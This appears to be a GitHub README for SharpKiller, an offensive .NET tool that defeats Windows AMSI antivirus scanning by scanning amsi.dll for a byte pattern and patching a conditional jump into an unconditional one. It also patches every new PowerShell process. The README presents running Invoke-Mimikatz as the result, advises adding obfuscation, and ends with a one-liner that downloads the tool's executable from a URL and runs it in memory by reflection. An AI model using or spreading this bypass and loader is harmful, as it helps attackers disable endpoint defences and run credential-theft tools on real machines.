S1lkys / SharpKiller

Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

SharpKiller

Lifetime AMSI bypass AMSI-Killer by @ZeroMemoryEx ported to .NET Framework 4.8.

Additional Obfuscation required

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/SharpKiller.A&ThreatID=2147895059

Newly integrated features:

[ x ] - Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances

Building the solution

  • Set your platform explicitly to x64 in Build > configuration manager

How does it work?

Opcode Scan

  • we get the exact address of the jump instruction by searching for the first byte of each instruction this technique is effective even in the face of updates or modifications to the target data set.

  • for example :

    | 48:85D2 | test rdx, rdx |

    | 74 3F | je amsi.7FFAE957C694 |

    | 48 : 85C9 | test rcx, rcx |

    | 74 3A | je amsi.7FFAE957C694 |

    | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |

    | 74 33 | je amsi.7FFAE957C694 |

  • the search pattern will be like this :

    { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

    image

Patch

Before Patch

  • The program tests the value of RDX against itself. If the comparison evaluates to 0, the program executes a jump to return. Otherwise, the program proceeds to evaluate the next instruction

    image

  • we cant execute "Invoke-Mimikatz"

    image

After Patch

  • we patch the first byte and change it from JE to JMP so it return directly

    Screenshot 2023-02-26 195848

    image

  • now we can execute "Invoke-Mimikatz"

Newly created processes

  • Sharp-Killer will patch any newly created Powershell processes in near real time.

Video demo

video

OneLiner to run with reflection

$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));

References:

About

Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8


Languages

Language:C# 100.0%